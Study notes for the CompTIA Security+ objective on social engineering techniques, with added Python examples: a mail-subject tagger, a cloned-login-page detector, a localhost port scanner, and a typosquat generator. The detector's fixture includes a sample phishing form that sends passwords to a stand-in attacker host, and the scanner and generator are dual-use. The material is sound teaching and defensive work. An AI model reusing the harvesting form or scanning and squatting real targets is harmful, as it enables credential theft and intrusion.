Social Engineering Techniques | CompTIA Security+ SY0-601 | 1.1b

In this video you will learn about social engineering techniques such as: prepending, identity fraud, invoice scams, credential harvesting, reconnaissance, hoax, impersonation, watering hole attack, typosquatting, pretexting, influence campaigns, & principles pertaining to reasons for effectiveness.

Prepending

Prepend means to attach content as a prefix.  The term comes from programming & automated processing: a prepend operation in a script or code module adds characters to the beginning of a string, or an element to the front of a list, and the same idea is applied automatically by mail systems.[1]  Email servers & cloud email services can be configured to prepend a label to the subject line of every message that arrives from outside the organization, so that recipients can tell external mail apart from internal mail at a glance.[2]
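
An added example (not code from the video or its cited sources) of the gateway rule described above, in Python: it parses a message, decides whether the sender domain is one of the organization's own, and prepends an [EXTERNAL] tag to the subject exactly once.  The internal domain list, the tag text and the sample messages are assumptions constructed for this example.

```python
from email import message_from_string
from email.utils import parseaddr

# Assumption: the organization's own sending domains.
INTERNAL_DOMAINS = {"example.com"}
TAG = "[EXTERNAL]"


def sender_domain(from_header):
    """Return the lower-cased domain of the address in a From: header.
    parseaddr() separates the display name from the real address, so a
    display name that merely looks like an internal address does not count."""
    _, addr = parseaddr(from_header or "")
    return addr.rpartition("@")[2].lower()


def tag_subject(subject, tag=TAG):
    """Prepend the tag unless the subject already starts with it, so a
    message that passes through the gateway twice is not tagged twice."""
    subject = (subject or "").strip()
    if subject.upper().startswith(tag.upper()):
        return subject
    return f"{tag} {subject}".rstrip()


def rewrite_subject(raw_message, internal_domains=INTERNAL_DOMAINS):
    """Gateway rule: return the subject line the recipient should see.

    Caveat: the From: header is written by the sender and can be forged.
    A production gateway should decide 'external' from the connector the
    message arrived on, or from a DKIM/SPF pass for the claimed domain;
    this example keys on From: only to keep the rule short."""
    msg = message_from_string(raw_message)
    subject = msg.get("Subject", "")
    if sender_domain(msg.get("From", "")) in internal_domains:
        return subject.strip()
    return tag_subject(subject)


# Constructed sample messages (not real traffic).
SAMPLES = {
    "internal": "From: Alice <alice@example.com>\nSubject: Q3 budget\n\nhi\n",
    "external": "From: Vendor Billing <billing@partner.net>\nSubject: Invoice 4471\n\nplease pay\n",
    "already_tagged": "From: billing@partner.net\nSubject: [EXTERNAL] Invoice 4471\n\n...\n",
    # Display name imitates an internal address; the real address is external.
    "forged_display": 'From: "alice@example.com" <attacker@evil.test>\nSubject: urgent\n\n...\n',
}


def run_samples():
    return {name: rewrite_subject(raw) for name, raw in SAMPLES.items()}


if __name__ == "__main__":
    for name, subj in run_samples().items():
        print(f"{name:15} -> {subj}")
```

The "forged_display" sample shows why the check must look at the address rather than the display name; a forged address inside an internal domain would still slip past this rule untagged, which is why real gateways tag based on the inbound connector or an authentication result rather than the header text.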

Identity Fraud

Identity fraud (identity theft) occurs when an assailant impersonates you for their own gain using stolen information that identifies you (Social Security number, address, etc.).  Examples of the nefarious actions that may be carried out by a criminal using your identity include:[3]

  • Opening bank or credit accounts tied to you
  • Filing a bogus tax return and collecting your refund
  • Making online purchases, sometimes with the intention of selling goods on the black market
  • Claiming your identity to shift medical expense liability (medical identity theft)

Invoice Scams

Invoice scams are unsolicited emails or other messages that include an “invoice” (often as a malicious attachment) for something the victim has not purchased.  A scammer may first research the target and then send a tailored message with an invoice for something the target has plausibly purchased in the past, so that the bill looks routine.[2]  Typically, these scams work in three steps:

  1. Phishers attempt to find contracts and names of suppliers providing goods to a particular company
  2. They impersonate a legitimate supplier and send bills to subordinate personnel
  3. They try to solidify their efforts by sending fake letters that claim to come from the actual supplier’s designated bank

Fake invoice scams take advantage of the fact that the average email user or someone handling administrative tasks for a business (or personal affairs) may not know whether any product or service has actually been purchased.[4]

Credential Harvesting

Credential harvesting (password harvesting) is the process of gathering valid usernames, passwords, private emails, & email addresses, frequently through breaches of infrastructure.  The possible motivations for such a breach are many:  the attackers could sell personal & financial data on the dark web; gain access to a company network for corporate espionage and steal IP or other assets; or use the data to embezzle money.  The most commonly cited vector is the phishing email.  Such an email carries an attachment or a hyperlink that, when opened, installs credential-stealing malware on the victim’s machine or leads to a cloned login page that records whatever the victim types into it.  Beyond phishing, credentials are also harvested by malware, cloned website links, insecure third-party vendors, and ransomware operators.  In many cases the affected user has no idea that the attack has even occurred.[5]
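
An added example (not from the video or its sources) of one check a practitioner can run on a suspected cloned login page, in Python: parse the HTML, find every form that collects a password, and flag forms that submit to a different host than the page itself or over plain HTTP, which is the signature of a page built to harvest credentials.  Both sample pages and their URLs are constructed for this example.  Federated logins legitimately post to another host, so treat the result as a triage signal rather than a verdict.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class LoginFormCollector(HTMLParser):
    """Collect every <form> and note whether it contains a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._open = None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            self._open = {"action": a.get("action", ""), "has_password": False}
            self.forms.append(self._open)
        elif tag == "input" and self._open is not None:
            if a.get("type", "").lower() == "password":
                self._open["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None


def harvesting_findings(page_url, html):
    """Return (finding, submit_url) pairs for forms that collect a password
    and send it somewhere other than the page's own origin over HTTPS."""
    parser = LoginFormCollector()
    parser.feed(html)
    page = urlsplit(page_url)
    findings = []
    for form in parser.forms:
        if not form["has_password"]:
            continue
        # An empty action submits back to the page URL itself.
        target = urlsplit(urljoin(page_url, form["action"] or page_url))
        if target.scheme != "https":
            findings.append(("password_sent_over_plaintext", target.geturl()))
        if (target.hostname or "").lower() != (page.hostname or "").lower():
            findings.append(("password_sent_to_other_host", target.geturl()))
    return findings


# Constructed pages (not captured from any real site).
LEGIT_PAGE = """<html><body>
<form method="post" action="/session">
  <input name="user"><input type="password" name="pw">
</form></body></html>"""

CLONED_PAGE = """<html><body>
<img src="/logo.png">
<form method="post" action="http://collect.attacker.test/harvest">
  <input name="user"><input type="PASSWORD" name="pw">
</form>
<form action="/search"><input name="q"></form>
</body></html>"""


def demo():
    return {
        "legit": harvesting_findings("https://login.example.com/signin", LEGIT_PAGE),
        "cloned": harvesting_findings("https://login.examp1e.com/signin", CLONED_PAGE),
    }


if __name__ == "__main__":
    for name, found in demo().items():
        print(name, found or "no findings")
```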

Reconnaissance

In the context of cybersecurity, reconnaissance is the practice of covertly discovering & collecting information about a system.  This method is often used in ethical hacking or penetration testing.  Reconnaissance generally follows seven steps:

  1. Collect initial information
  2. Determine the network range
  3. Identify active machines
  4. Find access points & open ports
  5. Fingerprint the operating system
  6. Discover services on ports
  7. Map the network

Using these steps, an attacker will aim to gain the following information about a network:

  • File permissions
  • Running network services
  • OS platform
  • Trust relationships
  • User account information

One of the most common reconnaissance techniques is port scanning, which sends probes to various TCP & UDP ports on a device and classifies each port from the response (or the absence of one) as open, closed, or filtered.[6]
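
An added example (not from the video or its sources) of the steps 4 through 6 above in Python: a TCP connect scan that classifies ports as open, closed or filtered and grabs the service banner from open ones.  So that it runs offline, the block starts its own throwaway service on 127.0.0.1 with a made-up banner and scans that; the banner text and port choice are assumptions for the example.

```python
import socket
import threading


def start_fake_service(banner=b"SSH-2.0-OpenSSH_9.6\r\n"):
    """Start a throwaway TCP service on 127.0.0.1 that greets each client
    with a banner, so the scan has something to discover.
    Returns (listening socket, port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))          # port 0: let the OS pick a free port
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:             # listener was closed
                return
            with conn:
                conn.sendall(banner)

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]


def reserve_closed_port():
    """Find a port that is currently closed: bind, read the number, release."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as tmp:
        tmp.bind(("127.0.0.1", 0))
        return tmp.getsockname()[1]


def scan_port(host, port, timeout=0.5):
    """TCP connect scan of one port.  'closed' means the host answered with
    a RST, 'filtered' means nothing came back within the timeout (typically
    a firewall dropping the probe), 'open' means the handshake completed."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
        except ConnectionRefusedError:
            return {"port": port, "state": "closed", "banner": ""}
        except (socket.timeout, OSError):
            return {"port": port, "state": "filtered", "banner": ""}
        # Step 6: many services announce themselves; read what they send.
        try:
            banner = s.recv(256).decode("ascii", errors="replace").strip()
        except (socket.timeout, OSError):
            banner = ""
        return {"port": port, "state": "open", "banner": banner}


def scan(host, ports, timeout=0.5):
    return [scan_port(host, p, timeout) for p in ports]


def demo():
    """Scan one open port (the fake service) and one port known to be closed."""
    srv, open_port = start_fake_service()
    try:
        return scan("127.0.0.1", [open_port, reserve_closed_port()])
    finally:
        srv.close()


if __name__ == "__main__":
    for r in demo():
        print(f"{r['port']:5} {r['state']:8} {r['banner']}")
```

A connect scan completes the full handshake, so it shows up in the target's logs; the cited seven-step process is what tools such as nmap automate, with SYN scans and timing options to reduce that footprint.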

Hoax

A hoax is an attempt to deceive people into believing something that is false.  The line between hoaxes & phishing can be quite gray.  However, hoaxes can be delivered in person or through other means of communication, whereas phishing is generally confined to e-communication & phone.  Phishing can occur at any time and has the specific goal of obtaining private information, while a hoax is often perpetrated on holidays or other special days and may be carried out simply for fun.  Regardless, hoaxes use up valuable organization resources such as email replies, Internet bandwidth, staff time, etc.[2]

Impersonation

Impersonation is a form of fraud in which attackers pose as a known or trusted person to dupe an employee into transferring money to a fraudulent account, sharing sensitive information (such as intellectual property, financial data or payroll information), or revealing login credentials that attackers can use to break into a company’s computer network.  CEO fraud, business email compromise and whaling are specific forms of impersonation attack in which malicious individuals pose as high-level executives within a company.  Impersonation attacks are typically malware-less attacks conducted through email, using social engineering to gain the trust of a targeted employee.  Attackers may research a victim online, gathering information from social media accounts and other online sources which, when used in the text of an email, lends authenticity to the message.[7]

Watering Hole Attack

A watering hole attack is a strategy in which the attacker guesses or observes which websites the members of a targeted organization often visit and infects one or more of them with malware.  Eventually, some members of the targeted group will become infected.[8]  Attacks seeking specific victims may serve the malicious content only to visitors coming from particular IP addresses, which also makes the compromise harder to detect and investigate.[9]

Typosquatting

Typosquatting (URL hijacking or fake URL) is a form of cybersquatting, and possibly brandjacking, that relies on mistakes such as typos made by Internet users when entering a website address into a web browser.  A user who mistypes an address may be led to any URL, including an alternative website owned by a cybersquatter.[10]  The typosquatter’s URL will usually be one of five kinds, all similar to the victim site’s address:

  • A common misspelling, or foreign-language spelling, of the intended site
  • A misspelling based on a typographical error
  • A plural of a singular domain name
  • A different top-level domain (.com instead of .org)
  • An abuse of the Country Code Top-Level Domain (.cm, .co, or .om instead of .com)

Once in a typosquatter’s site, the user may also be tricked into thinking that they are in fact in the real site, through the use of copied or similar logos, website layouts, or content.  Spam emails sometimes make use of typosquatting URLs to trick users into visiting malicious sites that look like a given bank’s site.
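
An added example (not from the video or its sources) that turns the five kinds of look-alike domain listed above into code, in Python: it generates the candidate typosquats for a protected domain (omitted, doubled and adjacent-key characters, transposed pairs, the plural form, and swapped or abused TLDs) and checks whether a given host name is one of them.  The keyboard map, the TLD list and the sample host names are assumptions for the example; the generator goes slightly beyond the list by including doubled characters, which is another common typo.

```python
# Adjacent keys on a US QWERTY keyboard, for "fat-finger" substitutions.
QWERTY = {
    "q": "wa", "w": "qes", "e": "wrd", "r": "etf", "t": "ryg", "y": "tuh",
    "u": "yij", "i": "uok", "o": "ipl", "p": "o", "a": "qsz", "s": "awdz",
    "d": "sefx", "f": "drgc", "g": "fthv", "h": "gjyb", "j": "hkun",
    "k": "jlim", "l": "ko", "z": "asx", "x": "zsdc", "c": "xdfv",
    "v": "cfgb", "b": "vghn", "n": "bhjm", "m": "njk",
}
# Swapped TLDs, including the ccTLD abuse (.cm, .co, .om) named above.
ALT_TLDS = ("org", "net", "co", "cm", "om")


def typosquat_candidates(domain):
    """Generate look-alike domains of the kinds listed in the text."""
    name, _, tld = domain.lower().rpartition(".")
    cands = set()
    for i in range(len(name)):
        cands.add(f"{name[:i]}{name[i + 1:]}.{tld}")                  # omitted character
        cands.add(f"{name[:i + 1]}{name[i]}{name[i + 1:]}.{tld}")     # doubled character
        for alt in QWERTY.get(name[i], ""):                           # adjacent-key typo
            cands.add(f"{name[:i]}{alt}{name[i + 1:]}.{tld}")
    for i in range(len(name) - 1):                                    # transposed pair
        cands.add(f"{name[:i]}{name[i + 1]}{name[i]}{name[i + 2:]}.{tld}")
    cands.add(f"{name}s.{tld}")                                       # plural
    for alt in ALT_TLDS:                                              # TLD swap / ccTLD abuse
        if alt != tld:
            cands.add(f"{name}.{alt}")
    cands.discard(domain.lower())       # the genuine domain is not a squat
    cands.discard(f".{tld}")            # produced when the name is one character long
    return cands


def imitated_domain(host, protected_domains):
    """Return the protected domain that `host` imitates, or None if it is
    either the genuine site or unrelated to every protected domain."""
    host = host.lower().strip(".")
    for real in protected_domains:
        real = real.lower()
        if host == real:
            return None
        if host in typosquat_candidates(real):
            return real
    return None


def demo(protected=("example.com",)):
    # Constructed host names: the genuine site, four squats, one unrelated site.
    hosts = ["example.com", "exmaple.com", "example.cm",
             "examples.com", "exampke.com", "wikipedia.org"]
    return {h: imitated_domain(h, protected) for h in hosts}


if __name__ == "__main__":
    for host, real in demo().items():
        print(f"{host:15} -> {real or 'not a look-alike'}")
```

In practice the candidate list is fed to DNS, WHOIS or certificate-transparency lookups to find which look-alikes someone has actually registered (this is what tools such as dnstwist automate), and the match function is used inline to flag links in incoming mail.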

Pretexting

Pretexting is a type of social engineering attack in which the attacker creates a situation, or pretext, to lure a victim into a vulnerable position and trick them into giving up private information, specifically information the victim would not normally give outside the context of the pretext.[11]  Historically, pretexting has been described as the first stage of social engineering, and it has been used by the FBI to aid in investigations.[12]  One reason for pretexting’s prevalence among social engineering attacks is that it relies on manipulating people to obtain the information the attacker wants, rather than on breaking into a technological system.  When looking for victims, attackers look for characteristics such as a readiness to trust, a low perception of threat, deference to authority, and susceptibility to react with fear or excitement in different situations.[13]

Influence Campaigns

  • Hybrid Warfare:  A concept that originated with the armed forces.  Attackers apply hybrid-warfare techniques in cyber & influence campaigns to manipulate people into believing something that may not be true, using various types of propaganda that are often shared on social media sites.
  • Social Media:  Threat actors use automated bots on social media sites like Twitter & Facebook to sway users’ sentiment.  These bots are used to try to manipulate public opinion on contentious issues including political events, gun control, abortion, etc.[2]

Principles (Reasons for Effectiveness)

The following are the principles social engineers rely on to make their manipulation effective:[2]

  • Authority:  A social engineer shows confidence & perhaps authority – whether legal, organizational, or social authority.
  • Intimidation:  Attackers can use intimidation to manipulate their victims to perform some action or to reveal sensitive information.
  • Consensus:  Also called “social proof”, this is the psychological tendency of a person who cannot determine the appropriate behavior in a situation to copy what others are doing.  For example, you might see others acting in a certain way & assume that it is appropriate.  Social engineers use this tactic when an individual enters an unfamiliar situation that he or she doesn’t know how to deal with, and they might manipulate multiple people at once with it.
  • Scarcity:  It is possible to use scarcity to create a feeling of urgency in a decision-making context.  Specific language can be used to heighten urgency & manipulate victims.  Salespeople often use scarcity to manipulate clients by telling a customer that an offer is for today only or that there are limited supplies.  Social engineers use similar techniques.
  • Familiarity:  Individuals can be influenced by things or people they like or are familiar with.  Social engineers take advantage of these human vulnerabilities to manipulate their victims.
  • Trust:  Attackers take advantage of the trust a person has in another person or organization in order to influence them to perform some action or reveal sensitive information.
  • Urgency:  A sense of immediate urgency can be used to prompt a person to act quickly.  Social engineers use urgency to pressure their victims into acting fast to avoid or rectify a perceived dangerous or painful situation.